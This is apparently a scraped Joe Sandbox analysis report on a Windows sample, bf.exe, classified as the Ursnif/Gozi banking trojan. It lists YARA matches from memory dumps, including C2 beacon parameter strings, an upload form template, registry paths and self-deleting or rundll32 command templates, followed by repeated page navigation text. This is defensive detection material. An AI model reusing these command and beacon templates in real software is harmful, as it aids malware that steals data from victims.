0000000B.00000000.714710213.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000000B.00000000.714710213.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x86c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8ac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xcf2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x91f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9f5:$a6: http://constitution.org/usdeclar.txt 0xb7a:$a7: grabs= 0x104c:$a8: CHROME.DLL 0x9c9:$a9: Software\AppDataLow\Software\Microsoft\ 0x3a90:$a9: Software\AppDataLow\Software\Microsoft\ 0x3af0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3b50:$a9: Software\AppDataLow\Software\Microsoft\ 0x3bb0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3c10:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x5d4:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x614:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xa06:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x687:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x750:$a6: http://constitution.org/usdeclar.txt 0x8d5:$a7: grabs= 0xf32:$a8: CHROME.DLL 0x724:$a9: Software\AppDataLow\Software\Microsoft\ 0x37f0:$a9: Software\AppDataLow\Software\Microsoft\ 0x3848:$a9: Software\AppDataLow\Software\Microsoft\ 0x38a8:$a9: Software\AppDataLow\Software\Microsoft\ 0x3908:$a9: Software\AppDataLow\Software\Microsoft\ 0x3968:$a9: Software\AppDataLow\Software\Microsoft\
00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x86c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8ac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xcf2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x91f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9f5:$a6: http://constitution.org/usdeclar.txt 0xb7a:$a7: grabs= 0x104c:$a8: CHROME.DLL 0x9c9:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1868:$a9: Software\AppDataLow\Software\Microsoft\
0000000C.00000000.684080193.0000000000480000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.614315107.0000000001329000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
Process Memory Space: bf.exe PID: 1364	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: bf.exe PID: 1364	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xae9:$a5: filename="%.4u.%lu" 0xde7:$a5: filename="%.4u.%lu" 0x57f04:$a5: filename="%.4u.%lu" 0x58202:$a5: filename="%.4u.%lu" 0x14159d:$a5: filename="%.4u.%lu" 0x14189b:$a5: filename="%.4u.%lu" 0x1ffa97:$a5: filename="%.4u.%lu" 0x200b01:$a5: filename="%.4u.%lu" 0x2bc0e0:$a5: filename="%.4u.%lu" 0x2bd14a:$a5: filename="%.4u.%lu" 0x2d33c3:$a5: filename="%.4u.%lu" 0x2d36c1:$a5: filename="%.4u.%lu" 0x5b1:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x579cc:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x141065:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x1ff5c3:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x2bbc0c:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x2d2e8b:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x4de:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x89f:$a8: %08X-%04X-%04X-%04X-%08X%04X

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report
bf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Signatures

Memory Dumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report bf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Signatures

Memory Dumps

Windows Analysis Report
bf.exe